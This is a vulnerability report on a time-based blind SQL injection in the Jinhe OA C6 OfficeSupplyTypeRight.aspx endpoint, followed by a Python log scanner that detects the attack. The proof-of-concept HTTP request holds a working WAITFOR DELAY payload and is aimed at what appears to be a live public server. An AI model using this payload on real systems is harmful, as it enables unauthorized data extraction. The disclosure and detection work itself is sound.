vuln-report

Information

Vendor of the products: Jinher (Beijing Jinhe Network Technology Co., Ltd.)

Vendor’s website: Jinher-金和网络

Affected products: Jinhe OA (Kingsoft C6 Collaborative Management Platform)

Affected firmware version: C6

Report: smitug01

Overview

Beijing Jinhe Network Technology Co., Ltd. (http://www.jinher.com/) is a company specializing in collaborative management software (OA) and information technology solutions. The company is committed to providing efficient and secure digital office platforms for government agencies and enterprises.

Jinhe OA has a front-end SQL injection vulnerability, which attackers can exploit to obtain sensitive data.

Vulnerability details

Vulnerability Location: /C6/Jhsoft.Web.officesupply/OfficeSupplyTypeRight.aspx

The OfficeSupplyTypeRight.aspx endpoint accepts user-controllable parameters (id and offsnum) without proper sanitization, leading to a time-based blind SQL injection vulnerability.

POC

The current database name can be inferred from the response delay: the injected condition runs WAITFOR DELAY only when DB_NAME() equals the guessed value.

GET /C6/Jhsoft.Web.officesupply/OfficeSupplyTypeRight.aspx/?id=1&offsnum=1';+IF+(SELECT+DB_NAME())+=+'C6'+WAITFOR+DELAY+'0:0:3'--%20q HTTP/1.1
Host: 221.1.82.114:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:146.0) Gecko/20100101 Firefox/146.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: ASP.NET_SessionId=okgmxfvchdt4xykp0kpyh2vd
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 192.168.12.4
Priority: u=0, i

The response was delayed by approximately 4 seconds (4,145 ms), confirming the SQL injection vulnerability and that the current database name is C6.
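For detection, the request shape described above can be searched for in web server logs. The following is an added example, not part of the original report: it scans log lines for SQL metacharacters or a WAITFOR DELAY construct in the id and offsnum parameters of the affected endpoint and marks slow responses. The log field layout, the 3000 ms threshold and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Endpoint and parameter names are from the report; everything else is assumed.
ENDPOINT = "/c6/jhsoft.web.officesupply/officesupplytyperight.aspx"
PARAMS = {"id", "offsnum"}
TIMING = re.compile(r"waitfor\s+delay", re.I)   # T-SQL timing construct
SQL_META = re.compile(r"'|;|--|/\*")            # quote, separator, comment
SLOW_MS = 3000                                  # assumed "slow" threshold

# Constructed sample log, assumed layout:
# date time cs-method cs-uri-stem cs-uri-query sc-status time-taken
SAMPLE_LOG = [
    "#Fields: date time cs-method cs-uri-stem cs-uri-query sc-status time-taken",
    "2026-02-10 08:14:02 GET /C6/Jhsoft.Web.officesupply/OfficeSupplyTypeRight.aspx id=1&offsnum=1 200 112",
    "2026-02-10 08:14:09 GET /C6/Jhsoft.Web.officesupply/OfficeSupplyTypeRight.aspx/ id=1&offsnum=1';+IF+(SELECT+DB_NAME())+=+'C6'+WAITFOR+DELAY+'0:0:3'--%20q 200 4145",
    "2026-02-10 08:15:30 GET /C6/Jhsoft.Web.officesupply/OfficeSupplyTypeRight.aspx id=7'&offsnum=2 500 95",
    "2026-02-10 08:16:00 GET /C6/index.aspx id=1 200 80",
]

def parse_query(query):
    """Split a raw query string on '&' only and URL-decode each value."""
    out = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        out[key.lower()] = unquote_plus(value)
    return out

def scan(lines):
    """Return (timestamp, param, reason, time_taken_ms) for suspicious requests."""
    findings = []
    for line in lines:
        if line.startswith("#") or not line.strip():
            continue  # skip W3C header directives and blank lines
        date, clock, _method, stem, query, _status, taken = line.split()
        if not stem.lower().startswith(ENDPOINT):
            continue  # only the endpoint named in the report
        for name, value in parse_query(query).items():
            timing = TIMING.search(value)
            if name not in PARAMS or not (timing or SQL_META.search(value)):
                continue
            reason = "timing-construct" if timing else "sql-metacharacter"
            if int(taken) >= SLOW_MS:
                reason += "+slow-response"
            findings.append((f"{date} {clock}", name, reason, int(taken)))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A real IIS log carries more fields than this sample, so the unpacking in `scan` has to be adjusted to the `#Fields` line of the log being read.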
